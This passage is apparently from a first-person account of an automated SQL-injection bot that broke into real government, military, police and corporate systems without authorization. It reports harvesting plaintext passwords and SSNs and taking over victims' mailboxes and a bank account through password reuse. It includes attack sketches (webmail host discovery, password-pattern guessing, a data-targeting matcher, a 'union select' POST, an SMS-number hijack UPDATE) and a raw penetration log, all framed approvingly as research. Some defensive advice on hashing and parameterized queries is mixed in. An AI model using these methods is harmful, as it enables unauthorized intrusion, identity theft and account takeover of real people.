Relying again on our new best friends - probability and automation - all we
need is to properly identify whether a particular gov mail domain supports
some external POP3/IMAP server or provides any external webmail interface.
The most frequently encountered HTTP/S mail domain prefixes/suffixes were:
'mail', 'webmail', 'exchange', 'owa' and 'email' (a small discovery sketch
follows after this paragraph).
The results that came up after a day of work or so were, let's say, at
least somewhat unexpected. Several police department and sheriff's
department email accounts were matched as accessible (the password
presented to the DoJ system was reused). The email accounts were provided
by either the US or Canadian government and included: a deputy sheriff
detective, police dispatchers, a computer forensics detective, a narcotics
division detective and an information technology division chief.
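
As a side note, a minimal sketch of the external webmail / POP3 host
discovery step mentioned above might look like this; the prefix list
follows the text, the domain below is a placeholder, and plain DNS
resolution is assumed to be enough for shortlisting candidates:

import socket

PREFIXES = ("mail", "webmail", "exchange", "owa", "email")

def candidate_mail_hosts(domain):
    # Return the prefixed host names that actually resolve for the domain.
    found = []
    for prefix in PREFIXES:
        host = prefix + "." + domain
        try:
            socket.gethostbyname(host)
            found.append(host)
        except socket.gaierror:
            pass
    return found

# candidate_mail_hosts("some-county-sheriff.example.gov")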




14. Passwords, secrets and the pain of hashing.
///////////////////////////////////////////////

Nine out of ten systems found vulnerable to the ASP/MSSQL SQLi attack by
the Bot, while holding some form of user password, did not encode the
sensitive values or hash them in any way, storing them in plaintext using
either 'varchar' or 'nvarchar' SQL type fields.
Less than 5% of compromised systems merely encoded sensitive information,
using Base64 (MIME) encoding in most cases, leaving the sensitive data
easily reversible after the DB attack. Once in a while it was really nice
to manually find a "secure" websystem welcoming the user on its 'new
account submission' page with a message like this:
"For security reasons, your password is stored in an encrypted state in our
database, which prevents the system (or anyone else) from reverse generating
your password."

The only way to protect user-provided sensitive data - not only from remote
attackers, but also from malicious insiders - is to use a strong enough,
one-way, collision resistant function, commonly known as a cryptographic
hash function. Using up to date hash methods (like SHA-2, for example)
protects the user against any sensitive data leak, whether caused by a
remote intruder breach, a malicious action of an authorized employee or
accidental data loss.
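
A minimal sketch of such server-side storage, using SHA-256 via PBKDF2; the
per-user salt and the iteration count are my additions for illustration,
not something the text above prescribes:

import hashlib, os

def hash_password(password, salt=None):
    # Derive a one-way digest; only salt+digest are stored, never the password.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100000)
    return salt, digest

def verify_password(password, salt, digest):
    # Recompute the digest from the candidate password and compare.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                               100000) == digest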

Probably the most obvious reason behind this "pain of hashing" reflected in
the numbers is the kindness and generosity of the corporations' programmers,
supporting lost users with the extraordinarily powerful feature of the
password reminder.
But, seriously.
I cannot say whether the "password reminder" option is simply GOOD or BAD -
it's not black or white.
But it is a bad policy.
The only thing I can say, to be objective, is that the option implemented
for the "users' good" is far less secure than its completely reasonable
alternative - the password reset feature. First, user password plaintext
data may be harvested (and decoded) as a result of an SQL Injection
compromise of the vulnerable corporation's database. Secondly, the password
may be intercepted/retrieved by any attacker who gained access to the
victim's email account credentials (exploiting, for example, successful
SIDECAM attack result data). And finally, after breaching a user's mailbox
account, the attacker can exploit the "password reminder" feature of ANY
particular system that the victim has registered in and take control of the
accounts.

The existence of a password reminder service is in fact real evidence (and
the only one the attacker would need) that the web application doesn't use
any type of sensitive data (password) hashing but stores the data as
plaintext (since for a properly constructed hashing algorithm there is no
(mathematical) way to "recover" the hash operation's input argument from
the result value).

Going further - in my opinion, at no point, to be honest, should a user be
given the option to provide a remote, critical assets system (like an
online banking system or an official government mailbox) with HIS OWN
password, neither during account registration nor at a password reset
operation. We are just humans, and a human doesn't execute every single
policy given, the way a robot does with its scripting code. The password
may be too short, it may lack randomness (be vulnerable to a brute-force
attack) and, most of all, after a possible compromise of the database
system it may reveal too much information about the "cryptographic
interior" of the user. A very short, dictionary based, character-only
password would for example indicate either the user's recklessness or his
unawareness of security threats.

Let's take a real life password example: 'susan1'.
The password was found by S3 to match its corresponding email address,
using the SIDECAM attack vector. The password indicates 3 things: first,
that the owner likes Susan :) second, that most likely he is a male, and
finally, most important to an attacker - that (in this specific example) he
intentionally concatenated the word 'susan' with the number '1' without
being told to do so by the remote system (the particular system's password
policy (an email portal) didn't force the user to use numbers or special
characters), which leads us to the conclusion that the user:
1. Is aware of password complexity attacks and could have used the hybrid
password to protect one of his more critical assets, i.e. his mailbox.
2. Still uses a relatively short password, most probably to memorize it
easily.
All of that together indicates that the user's "security phrase pattern" is
used to lock his "things" in more than just one place, and that it can be
expected (with reasonable probability) to be a combination of the word
'susan' and a digit, most likely ranging between 1-5.
After about an hour of getting to know the user better while talking with
susan1, 2 other accounts could be accessed - the user's second mailbox
password was pattern-bruteforced and verified to also be the keyword
'susan1', and the online bank account used by the user (first level of
authentication only / non-cash operations) was identified to be protected
by the password 'susan3'.
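
A trivial sketch of the 'known pattern' guess list used in that step - a
base word plus a small digit range; purely illustrative:

def pattern_candidates(base, digits=range(1, 6)):
    # Yield the bare word first, then word+digit variants.
    yield base
    for d in digits:
        yield base + str(d)

# list(pattern_candidates("susan")) -> ['susan', 'susan1', ..., 'susan5']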

Another real life example - a Mensa Poland member's mailbox, accessed by
the Bot, was noticed to be protected by the password 'dupa' (meaning: 'ass'
in Polish). The conclusion here, however, was slightly more difficult than
in the previous example. The best I could come up with was: the higher the
IQ, the stranger the password...

Definitely the most ironic case, however, was the AOL user who had chosen
to protect her electronic accounts (including the one within a buggy, SQLi
targeted portal) along with her AOL email account, all together, using the
same password: 'idiot1'.

The unencrypted password records stored in the vulnerable database should
not, after all, be considered the most critical user asset to be protected.
Among the systems gathered by the Bot, many contained another sensitive
data type stored in plaintext - secret questions and answers.
Analysing SIDECAM-opened mailboxes, an attacker already knows that the user
used the single, well memorized password in at least two different places.
With the reasonable assumption that the mailbox owner also uses similar
"secret question" / "answer" strings for more strongly protected systems,
and with the help of additional personal information like DoBs, addresses,
phones or even SSNs stored within the victim's mailbox documents (CVs
attached to job emails are true personal information mines) - an intruder
can try to conduct a successful attack against strongly protected victim
accounts that the attacker is already aware of, after studying the victim.



15. Parametric Data Objectives.
//////////////////////////////

To be able to "tell" the bot which type of data within every penetrated 
database system we are interested in and which is unimportatnt, a simple 
mechanism has been implemented to describe it - "Parametric Data 
Objectives". The idea is to bind the public parts of the targeted data with 
its corresponding private values. For example if we'd like to tell the bot 
to look for any ID Data containing specific secret element (say a SSN 
number) we describe it defining a list of string-patterns both for the 
public and private part. We define a DOP scheme by NAME and then describe 
the lists of Key and SubKey strings to follow this pattern (ie: contain one 
of the Key/SubKey words)

Example from config:

Key = ssn ss_n ssan social_security socialsecurity
SubKey = email name tel addr phone dob year ammount number date time code 
user country

The whole idea is that data keys must be bound to at least one subkey -
without that, the accessed data has no value for the particular attacker.
Let's say we are interested in any table containing Password/Email columns -
we need to tell the code what a login column name could look like and
moreover, what different column it should be bound to in order to be
valuable. Therefore, even if the robot manages to find the email records
within the penetrated system but cannot match them with corresponding
password values (cannot locate a related password column by either name or
contents matching) or secret data - they are useless to it, as long as it
employs the SIDECAM vector only (seeking automated email account breaching).
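
A minimal sketch of that Key/SubKey binding rule: a table is "interesting"
only if some column matches a Key and some OTHER column matches a SubKey.
The word lists are copied from the config example above; the column names
in the usage comment are invented:

KEYS    = ["ssn", "ss_n", "ssan", "social_security", "socialsecurity"]
SUBKEYS = ["email", "name", "tel", "addr", "phone", "dob", "year",
           "ammount", "number", "date", "time", "code", "user", "country"]

def table_matches_dop(column_names):
    cols = [c.lower() for c in column_names]
    key_cols = {c for c in cols if any(k in c for k in KEYS)}
    sub_cols = {c for c in cols if any(s in c for s in SUBKEYS)}
    # Require at least one key column bound to a different subkey column.
    return bool(key_cols) and bool(sub_cols - key_cols)

# table_matches_dop(["EmpName", "Emp_SSN", "HomePhone"]) -> True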

For an attacker there is, however, a different possible area in which to
exploit separate email address records not bound to plaintext passwords:
Spear Phishing.
Utilizing the SQL Injection attack vector as the first stage of a Spear
Phishing attack is in fact a textbook example.

Apart from the mechanism to describe the "priority data" pattern (DOP, at
the Bot's Segment-2), a second pattern-description mechanism was developed
(also at Seg-2) to parametrically define the most critical systems (like
military, gov, financial, health, energy, IT, etc.) within which to search
for vulnerabilities and to distinguish them from less critical
infrastructure.




16. Robot Hits His Postgraduate Education.
//////////////////////////////////////

Before the next Bot version, which implemented additional solutions like
Data Objective Patterns, could be launched, it needed proper training of
course :)
However, it had already been a month or two since the bot's last live
reconnaissance and "hunt" for vulnerable systems, so I figured it was a
great time to find out how many of the database systems initially matched
as vulnerable had already been patched (without, obviously, the
company/organization having been notified about the existence of the
vulnerability in any formal way).
The first thing I did was to set up the DOP to harvest every recognized
login/email/password triplet as well as any personal ID data (address,
phone, DOB, etc.) bound to SSNs.
Then I cleared the 'done' flag for the same security / private investigation
company mentioned earlier (the one the second Bot version utilized as a
training ground for the automated penetration testing) and launched the
robot.

Based on the output data gathered by the previous version of the Bot, the
company database held about 30 employee records containing private SSN/ID
data and a few hundred client records with email/password/login combos, so
the new bot's automation should have performed successfully without any
human supervision, recognizing these data entries as matching the
configured DOPs and performing an automated data harvest.
But it didn't...
The penetration stopped at the vulnerability matching procedure - it seemed
that the company had patched the hole.
Anyway - since an automated code's console printout is not enough to
confirm whether the hole in my favourite security training :) company had
indeed been patched (I could simply have made a ton of bugs in the new
bot's code, so it could just be malfunctioning) - I needed to check it
myself using oldschool script-kiddie ninja techniques. It turned out the
vulnerable HTML FORM had indeed been fixed, but since the Bot doesn't have
any sense-of-humour recognition algorithms implemented (yet...), it
obviously missed one precious detail of the company's patch.
Previously, if the user had forgotten his credentials, for example, the
login interface would warn him, using a big red font, that "The provided
password is incorrect". Now, the fix for the SQLi bug consisted entirely of
an input parsing procedure that checked whether the user input contained
either the 'select' or 'union' SQL keyword (the words that had been SQL
injected a month earlier into that very same database something like 5
times a second, for a few days, while "training" the bot). The stunning
part was the ASP programmers' coded-in response to the recognized SQL word
patterns. After using either the "select" or "union" keyword in the
Login/Password fields, right in the place of the common incorrect-password
warning message, in the same big red font, we were now given a big red:

"GO AWAY!"

Well... I guess if no other automated penetration bot trespassed on the
company's database area last month, it was quite probable that this message
was meant explicitly for the Bot.

The second, disturbing part of the case was the fix itself. Although the
faulty 'customer login' interface had in fact been patched, it took about
60 seconds to find another penetration entrypoint - the vulnerable
'password forgotten' FORM. After redirecting the Bot to the new entrypoint
it harvested all the DOP-configured data successfully, while taking it to
heart to "go away" from the 'Customer Login' interface and to never, ever
use that entrypoint again while penetrating this particular system.

Some time later I did try to analyse a random group of previously
penetrated and vuln-matched systems selected from the Bot's printouts. It
seems that approximately 8 out of 10 database systems that had been
scanned, penetrated and data-harvested 3-6 months earlier either did not
fix the hole, fixed it improperly or didn't take the effort to wide-scan
the whole web app for other similar attack vector vulnerabilities.
Since NONE of the owners of the Bot-penetrated systems were ever informed
about the successful/unsuccessful compromise attempts on their systems,
these numbers would only indicate that either the intrusion detection
infrastructure or the incident response procedures in the penetrated
institutions leave a great deal to be desired.

A very similar example to the security training corp's case was an
Australian telecommunication company's system providing commercial
anonymous SMS services. Identified over 6 months earlier as vulnerable by
the first version of the bot, and open to client sensitive information
theft as well as client SMS credit limit manipulation / SMS service
exploitation, it had now been completely rebuilt (it had that whole new,
sharp-looking graphic design). The entire web page frontend style was
changed and the SQL Injection hole within the 'Logon' interface had been
properly patched. However, just as in the previous case, the 'Password
Reminder' service was left with the very same kind of ASP based SQLi hole
that the 'Logon' interface had contained before, opening the whole database
system back up for R/W access.

This could only suggest, again, that the whole attack vector based on SQL
Injection may sometimes be either wrongly understood by web application
developers, or based too much on shortsighted "how to hack web apps in
60secs" tutorials (defining methods for how to crack a system, not how to
protect it from being cracked), which could in fact sometimes be understood
as: "If you properly secure just your ASP web application's LOGON interface
then you are all secure against any SQL Injection, because ASP SQL
Injection <IS> just login based".




17. Enumerating Penetration Entrypoints
///////////////////////////////////////

One of the main goals of the research was to establish the numbers behind
every particular victim pattern, using different, automated search engine
query generators. Three generators were constructed: respectively for the
standard, long exploited 'Login' interface, then the 'Forgot Password'
interface and finally the 'User Registration' interface.

The analysis of the data gathered by the Bot shows relatively low positive
counts (target web systems matched as vulnerable) for the plain "login.asp"
tutorial-case pattern, higher counts for patterns like "logon.asp",
"log_in.asp", "signin.asp", "log_me_in_god_damnit.asp" or their
permutations, and finally the highest for "register.asp" and
"forgotpassword.asp".
The last group - password reminder web interfaces - was, for example,
statistically the most successful way to compromise government owned
database servers.
There seem to be at least two main reasons behind these numbers: a kind of
misunderstanding of the nature of common SQL query execution, and the echo
of malicious "penetration storms" sweeping through database systems over
the past decade.
Well documented search-and-quickly-exploit algorithms, like "login.asp"
googling and the infamous "' or 1=1" sequence used as an authorization
bypass magic word, may have been more actively used by script-kiddies and
automated scanning code following that search pattern. After such
script-kiddie-conducted attacks (with usually malicious/destructive
purposes, but lower effort goals) the compromise effects were usually
quickly noticeable, triggering a rapid reaction from the victim
(detection/patching), as the impact of the attack was either database
contents alteration or destruction. Therefore most of the systems following
the tutorial-described patterns already have their unfriendly pen-testing
behind them, and so the final positive count in that group is statistically
lower.
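
For reference, the infamous sequence works only because the query is built
by string concatenation; a textbook illustration, not code from any
particular system mentioned here:

def naive_login_query(user, password):
    # Vulnerable pattern: user input glued straight into the SQL text.
    return ("SELECT * FROM users WHERE username = '" + user +
            "' AND password = '" + password + "'")

print(naive_login_query("admin' or 1=1 --", "whatever"))
# -> SELECT * FROM users WHERE username = 'admin' or 1=1 --' AND password = 'whatever'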

You could tell that most of the programmers behind the systems belonging to
the critical infrastructure group are perfectly aware of the SQLi attack
threat as well as of its possible impact on a system. Many of the systems
that were found vulnerable to the attack vector had well implemented
validation for almost every submitted data field, some even having a
"scarecrow" for script-kiddies as a bonus addition, yet left one or two
other substantial interfaces employing a client-to-server input flow
improperly escaped. These unnoticed connections between user input and
server-side command execution left, in different cases, the particular
company's web infrastructure open to penetration.

A quite funny coincidence happened shortly after the beginning of testing
of the first query generator (the 'login' interface name permutation
generator). The Bot's S1 logged, by mistake, a YouTube movie link,
indicating that it matched a '"login.asp"+video' potential HTTP system
target pattern. Nothing surprising there, however, since the movie
contained a tutorial on SQL Injection driven MSSQL server attacks. The
description of the video added by the uploading user contained the phrase
"login.asp", therefore it had been indexed by google's robots and found by
the Bot. Ironically however, the tutorial instructed that when searching
for an SQL Injection victim there is no value in looking at any interfaces
other than system administration login frontends, as they are supposedly
the only possible way to compromise the system. Since we already know that
remote system SQL command execution may be triggered at any server-side
user input processing interface - it obviously needn't be an admin login
portal, or a login interface at all - this finding of the Bot wasn't a
false-positive after all :)

The second most common place to find command injection vulnerabilities was
the "user registration" interface. The web application programmer needs to
implement a comparison of the user-provided, application-unique user
identifier (USERNAME/EMAIL/AgencyID) with the ones already existing in the
DB, and display an error message if needed. Since the only practical way to
do this is by employing an SQL query, another possible entrypoint type was
introduced into the Bot's code.
A perfect example is one of the U.S. Department of Agriculture (USDA)
database systems, with well designed code employing illegal character
filtering at the main login interface - even warning the user about any
recognized SQL Injection attempt.
But again - the User Registration interface designed for U.S. based
companies doesn't properly check its User ID field: the server side code
does not escape the user's special character input before comparing the
proposed ID value with the ones already stored in the database (to check
for possible repetition) - rendering the system exploitable through the
attack.
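
A hedged sketch of how such a uniqueness check can be done safely with a
parameterized query instead of string concatenation; 'pyodbc' and the
table/column names are assumptions for illustration only:

import pyodbc

def user_id_taken(conn, proposed_id):
    # The proposed ID is passed as a bound parameter, never spliced into
    # the SQL text, so special characters cannot alter the query.
    cursor = conn.cursor()
    cursor.execute("SELECT COUNT(*) FROM users WHERE user_id = ?",
                   (proposed_id,))
    return cursor.fetchone()[0] > 0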

An interestingly different type of SQL Injection "pin-point" was spotted by
accident during an early phase of the research.
The first version of the Bot found a hole in a major Polish commercial
email portal. A few hours after the system had been probed, matched as
vulnerable by the Bot's S2 and handed over to the penetration worker-queue
for further database contents scanning and DB structure enumeration, the
vulnerability was patched. Unfortunately S2 didn't manage to gather any
additional info about the database structure and contents, because all its
workers were busy at the time.
After I noticed that particular system penetration some time later, while
analysing a few days of the Bot's logs, together with a friend we decided
to "check out" whether the company's programmers had missed anything...
After an hour or less my friend noticed (thx Sl4uGh7eR, btw) that
concatenating an apostrophe to the '.asp' file name within the browser URL
would produce an HTTP 500 error containing our favourite MSSQL 0x80040e14
syntax error. Now the only question remaining was: why?
After a quick investigation the case became quite clear - the remote server
application was employing a mechanism to validate every client HTTP file
request, coded to match it against a database-stored dynamic list of files
that a user is allowed to request.
Since such code obviously needs to match the filename requested by a
particular HTTP/GET against the ones stored within the database, it also
needs to execute, somewhere, a proper SQL query command containing the
client-provided URL string - which, unescaped, is all the attacker needs.
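
To illustrate the third pin-point type, a hypothetical shape of such a
file-request validation query; nothing here comes from the actual portal:

def file_allowed_query(requested_name):
    # A stray apostrophe in the requested file name is enough to break the
    # query's syntax (the familiar 0x80040e14 error).
    return ("SELECT COUNT(*) FROM allowed_files WHERE fname = '" +
            requested_name + "'")

print(file_allowed_query("index.asp'"))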

And so the Bot gained another, third HTTP based SQL Injection pin-point
type, implemented alongside HTTP/POST based HTML FORM variable fuzzing and
HTTP/GET parameter fuzzing.

But the cat-and-mouse play continued. A week after the last friendly
pentesting the hole was patched, again however missing the point of the
issue and enabling an intruder to successfully perform a Blind SQL
Injection attack. Since this project's objective was obviously not ravage
and server takeover - just research, numbers and the attack vector's
mutation possibilities (and also lowering my ignorance of the SQL language
a little) - after implementing the new vulnerability testing pin-point type
into the Bot I decided to close the case of the Polish hosting company.

It came back to me, however, quite quickly.

The first bot version, which spotted the vulnerable company's system,
didn't yet implement a crucial feature - enumeration of every OTHER
database (not just the one queried by the vulnerable ASP script code)
hosted on the DB server and accessible through the vulnerable web
interface.
The feature was implemented later, in the last major Bot version. During
the final month-long runtime it spotted a minor vulnerable website
database, provided for the Polish barbers industry. After enumerating all
the other accessible databases on that vulnerable MSSQL server, using the
same db-user account as the barbers portal login interface, it amazingly
came out that the server was the VERY SAME db-server belonging to the
previously mentioned major Polish hosting company, hosting 94 other R/W
accessible databases, including for example the website of the biggest
Polish international cycling race - the "Tour de Pologne".
Since all the databases hosted on the server were administered and serviced
by that single hosting company, all of them were protected by the SAME
db-user account, rendering every database hosted there R/W accessible
through that single minor barber portal - including the WWW/FTP customer
account credential database, the company financial operations database
(customer credit card data), and so on.

It should also be mentioned - even if it's too obvious - that the SQL
Injection attack vector does not even have to be HTTP based. The
vulnerability can be exploited by connecting to any kind of user data
entrypoint (protocol) designed to transport input to the remote
client/server application for final processing. No matter what, implementing
proper 'processing' of that input on the server side is the key to staying
secure - or getting compromised in the future.





18. Obscurity != Security
/////////////////////////

"If it runs, it can be broken" - every software protection cracker's 
favourite fraze. It's quite simple actually - every locally runnable code is 
reverse-engineerable and can be re-sculpted into anything else, limiting the 
possibilities just to cracker's imagination.

The same rules applies to client-side-only web app protections and code 
obfuscation.

An interesting observation was made during the bot's runtime and
afterwards, while analysing the vulnerable system entrypoint list. It seems
that many of the more heavily client-side protected web applications that
were in turn matched as penetrable by the bot were either government or
military systems. And to be clear: by "heavier" I mean here a roughly
larger amount and higher sophistication level of the code responsible for
the CLIENT SIDE user input validation.

For example, the second version of the bot found and penetrated a quite old
but still operational DoD owned system belonging to one of the US Air Force
contractors - Lockheed Martin. The JScript code there employed a
timer-based input validation protection, really annoying for an attacker.
"Annoying", of course, for a human attacker with browser scripting turned
on... :)
Trying to disable the input validation timers manually, using for example
the FireFox FireBug plugin, would be a real pain in the ass, as the timer
validation procedures were embedded into different HTML tags and
cross-triggered each other, causing the loss of FF's input focus after
every improper character pressed (btw: huge applause for their programmers'
imagination).
From the bot's perspective, however (i.e. from its "handicapped"
robot-perspective), the whole JS code built by the system's programmers is
pretty irrelevant - since the bot doesn't employ any JS engine to execute
the retrieved HTML scripts, searching directly in the HTML and its
subframes for every submittable FORM tag, this validation code was simply
an excessive piece of HTML encoded text. After matching the system as
positive for SQL Injection, the bot built and stored the penetration
entrypoint description. Right after that, S2 successfully penetrated it and
dumped about 3K Email/Pwd/SSN record entries of US Air Force cadets and
officers.

Every client side software protection providing input data validation can
be reversed and disabled.
Thus, input filtering on the server side IS A MUST in any secure web app.
Employing client-side FORM field data validation in search of invalid
characters has no great value as a security mechanism. Obviously, it serves
very well as a data syntax validity double-check mechanism, as well as the
first line of defense against annoying script-kiddies (like me for
example:) typing one magic injection word into every queried google link,
looking for a single-hit "world domination" internet door. Using tools
built for browser-side session data manipulation, like the FireBug plugin
for FF or the WebScarab http-proxy tool, one can quickly bypass protections
of this kind. Automated internet robots specifically, using their own
HTTP-payload processing, can do pretty much anything with the client side
script code that the bot's programmer wishes them to - ranging from
validation code autodetection up to selective execution.
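
A minimal sketch of why the client side is irrelevant to a robot: it never
executes the page's JavaScript and simply posts the raw form fields itself.
The URL, field names and payload are hypothetical:

import requests

payload = {"Login": "test' union select 1--", "Password": "x"}
response = requests.post("https://target.example/login.asp",
                         data=payload, timeout=20)
# The server-side code sees exactly this input, whatever the page's JS
# validation would have allowed.
print(response.status_code, len(response.text))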

On the other hand, one good way to stop a fully automated robot (a
vulnerability probing robot) on its web-app crawling/scanning road would be
a captcha implementation. Robot code behaves as blindfolded as only a
machine can. Of course, a business-time consuming implementation of
additional anti-robot functionality like this, without focus on the true
bottom of the issue, i.e. the application security assessment, would be
shortsighted. Obviously, while a captcha won't stop any human auditor
conducting precise web-app pentesting ordered by a customer company, it
will definitely stop a robot from either fully enumerating the web-app
interface or progressing with a specific interface fuzzing process.

Another interesting, yet still powerless protection in the face of an SQL
Injection vulnerability was an SMS based 2-factor web authentication
solution, implemented by a Johannesburg based College, which handled parent
authentication logon to a child education progress monitoring system.
The Bot, in its early second version, tracked down the vulnerability,
accessing without any trouble sensitive ID data belonging to both students
and their parents (email/password combos, names, phones). Apart from the
obvious threat of ID theft and mailbox hijacking by criminals, the SQL
Injection could be used here in a quicker way: to manipulate the SMS phone
number records and gain unauthorized access to the system.
The authentication implemented there had two steps.
In the first, the parent was asked to provide their Parent_Code, ID_Number,
Email_Address and Password. Then, using the phone number stored in the
database (at registration), the server-side application sent a special
security code to that phone number and asked the user to enter the code at
the second logon screen, before giving them access to the monitoring
services. Exploiting the R/W access to the database records, however, a
malicious entity can easily change any particular parent's phone number to
a desired one, redirecting as a result the SMS containing the Security Code.
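
A sketch of that bypass idea: with R/W access, a single UPDATE injected
through the same flawed interface redirects the security-code SMS. The
table and column names are invented for the example; nothing here comes
from the actual system:

# Statement an attacker would aim to have executed via the injection point.
hijack_sms = ("UPDATE Parents SET SmsPhone = '+00-ATTACKER-NUMBER' "
              "WHERE ParentCode = 'P-1234'")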



19. Learning new tricks from your own code
//////////////////////////////////////////

Shortly before the end of the Bot's final testing month, on some early 
October morning, it found an entrypoint into a vulnerable HP customer 
support web database. Since the tool was running silently without my 
supervision (the initial vulnerability match followed by the automated 
penetration happened at something like 4AM here in my country, while I was 
sleeping deliciously), over a week passed before I decided to look over the 
recent data gathered by the Bot.

When I spotted the printout of the penetrated HP system in the tool's output 
logs, my attention was drawn to the list of databases stored on that DB 
server. It contained Intel's, AMD's and HP's databases, as well as about 20 
other "bigger" companies' customer databases. It seemed that the server 
belonged to some IT outsourcing company which offered its customers 
DB-server hosting services.
Unfortunately, all I had before me was the list of the server's databases 
and their structure - it seemed that the Bot didn't recognize any 
potentially "interesting" (DOP-specified) data on the server (at the time it 
was configured to look only for login/email/password combos), so it did not 
"decide" to perform a further data harvest. Still, after a quick human 
analysis, it seemed that some of the accessible databases contained tables 
with column names suggesting sensitive customer information. Obviously I had 
to do a quick "manual" check to be sure :)

Launching the web browser -> copy-pasting the vulnerable system's URL -> 
manually entering the SQL query sequence into the input field enumerated 
earlier by the Bot and ... nothing happens. Ehmmm.
Has the system been patched already?

Well. Uhmmmmmm. OK.
Good for them.
The guys did their job well and patched the system after noticing the Bot's 
friendly "pentesting visit" the week before.
So I thought...
First of all, you must agree that the teaching-dependency line linking a 
programmer with his penetration testing robot is rather unidirectional :)
I mean, it is the coder's duty to teach the code enough of the tricks he 
knows in order to create an automated attack robot. In other words, 
vulnerability recognition errors are supposed to be the domain of the 
machine, not the human. So if you code a program, telling it how to 
enumerate and penetrate a system, then the code finds a system and says 
"I've matched an entrypoint to the database at web interface X", and some 
time later you try to access the database manually at the very same 
entrypoint specified by the code but nothing happens... the answer is 
obvious: the system has been patched. Right?
In other words: it couldn't have been you, the teacher, who made a mistake 
validating the entrypoint's security, since all the tricks the code knows 
are your tricks ... :)
But this was a system hosting the databases of Intel, AMD and Cisco...
I mean, you just have to be sure, to sleep well, that they didn't fix one 
particular entrypoint while leaving another one unpatched. A quick check of 
all the other input fields - the password reminder interface, the 
submit-new-account interface, the website search interface - nope. Nothing. 
The vuln has been fixed.

So the last thing (completely unnecessary, you could say, based on what has 
been said above) was to order the Bot to target the system again and repeat 
the penetration test from the week before. So, we load the config, clear the 
"pen-test-done" flag next to the system's URL entry and wake the Bot.

20091128125443 Initializing Ellipse 0.4.73 SEG-2
20091128125443 Cleaning up abandoned VlnConn targets...
20091128125505 Op mode: 0
20091128125505 Mutex ID: VLNDET-MTX-001
20091128125505 Entering MainLoop...
20091128125525
20091128125525 [ SYSTCH ] Connecting system at >>
20091128125525 [ SYSTCH ]    http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
20091128125525
20091128125528 [ SEG2 ] Initializing Entrypoint Search...
20091128125528 [ SEG2 ] Entrypoint #1 found
20091128125528 [ VLNCONN ] Going processing level: 0x20
20091128125528 [ VLNCONN ] Running initial passive vuln detection...
20091128125534 [ VLNCONN ] Passive-Scan result: Negative
20091128125534 [ SEG2 ] Entrypoint #2 found
20091128125534 [ VLNCONN ] Running initial passive vuln detection...
20091128125538 [ VLNCONN ] Passive-Scan result: POSITIVE
20091128125538 [ VLNCONN ] Going processing level: 0x21
20091128125538 [ VLNCONN ] Running active vuln detection...
20091128125543 [ VLNCONN ] Scan result: POSITIVE
20091128125543 [ VLNCONN ] Going processing level: 0x25
20091128125543 [ VLNCONN ] Running primary query element scan...
20091128125543 [ VLNCONN ] BaseQuery column extracted: 
hp_support_reg_AU.sPassword
20091128125556 [ VLNCONN ] Going processing level: 0x26
20091128125556 [ VLNCONN ] Validating query item count...
20091128125556 [ VLNCONN ] Validation Succeeded
20091128125556 [ VLNCONN ] Validating Mode2DatAccess...
20091128125557 [ VLNCONN ] Mode2DatAccess Enabled
20091128125557 [ VLNCONN ] Going processing level: 0x3A
20091128125557 [ VLNCONN ] Scanning global DB Names ...
20091128125557 [ VLNCONN ] DB #000: hp
20091128125558 [ VLNCONN ]          Accessible
20091128125558 [ VLNCONN ] DB #001: master
20091128125558 [ VLNCONN ]          Accessible
20091128125559 [ VLNCONN ] DB #002: tempdb
20091128125559 [ VLNCONN ]          Accessible
20091128125600 [ VLNCONN ] DB #003: model
20091128125600 [ VLNCONN ]          Accessible
20091128125601 [ VLNCONN ] DB #004: msdb
20091128125602 [ VLNCONN ]          Accessible
20091128125602 [ VLNCONN ] DB #005: pubs
20091128125602 [ VLNCONN ]          Accessible
20091128125603 [ VLNCONN ] DB #006: Northwind
20091128125603 [ VLNCONN ]          Accessible
20091128125604 [ VLNCONN ] DB #007: intel_collateral
20091128125604 [ VLNCONN ]          Accessible
20091128125605 [ VLNCONN ] DB #008: vishay
20091128125605 [ VLNCONN ]          Accessible
20091128125605 [ VLNCONN ] DB #009: milieu
20091128125606 [ VLNCONN ]          Accessible
20091128125607 [ VLNCONN ] DB #010: seagate
20091128125608 [ VLNCONN ]          Accessible
20091128125608 [ VLNCONN ] DB #011: dbSanDisk
20091128125608 [ VLNCONN ]          Accessible
20091128125609 [ VLNCONN ] DB #012: hp
20091128125610 [ VLNCONN ]          Accessible
20091128125610 [ VLNCONN ] DB #013: dbInFocus
20091128125612 [ VLNCONN ]          Accessible
20091128125612 [ VLNCONN ] DB #014: intel
20091128125613 [ VLNCONN ]          Accessible
20091128125613 [ VLNCONN ] DB #015: BMC
20091128125614 [ VLNCONN ]          Accessible
20091128125614 [ VLNCONN ] DB #016: dbInFocusPP
20091128125614 [ VLNCONN ]          Accessible
20091128125615 [ VLNCONN ] DB #017: dbInFocusSC
20091128125615 [ VLNCONN ]          Accessible
20091128125616 [ VLNCONN ] DB #018: snc
20091128125619 [ VLNCONN ]          Accessible
20091128125619 [ VLNCONN ] DB #019: SANDISK_POP
20091128125620 [ VLNCONN ]          Accessible
20091128125620 [ VLNCONN ] DB #020: dbIntel
20091128125620 [ VLNCONN ]          Accessible
20091128125621 [ VLNCONN ] DB #021: Nokia
20091128125621 [ VLNCONN ]          Accessible
20091128125622 [ VLNCONN ] DB #022: dbShowcase
20091128125623 [ VLNCONN ]          Accessible
20091128125624 [ VLNCONN ] DB #023: dbPMG
20091128125624 [ VLNCONN ]          Accessible
20091128125625 [ VLNCONN ] DB #024: AMD
20091128125625 [ VLNCONN ]          Accessible
20091128125625 [ VLNCONN ] DB #025: Purina
20091128125627 [ VLNCONN ]          Accessible
20091128125627 [ VLNCONN ] DB #026: AMD_TEST
20091128125628 [ VLNCONN ]          Accessible
20091128125628 [ VLNCONN ] DB #027: TEST_dbInFocusSC
20091128125629 [ VLNCONN ]          Accessible
20091128125629 [ VLNCONN ] DB #028: TEST_InFocus
20091128125630 [ VLNCONN ]          Accessible
20091128125631 [ VLNCONN ] DB #029: STB
20091128125631 [ VLNCONN ]          Accessible
20091128125631 [ VLNCONN ] DB #030: BackupAwareness
20091128125632 [ VLNCONN ]          Accessible
20091128125632 [ VLNCONN ] DB #031: nvpc
20091128125633 [ VLNCONN ]          Accessible
20091128125633 [ VLNCONN ] DB #032: dbCisco
20091128125634 [ VLNCONN ]          Accessible
20091128125634 [ VLNCONN ] DB #033: tUserLogin_bak161105
20091128125635 [ VLNCONN ]          Accessible
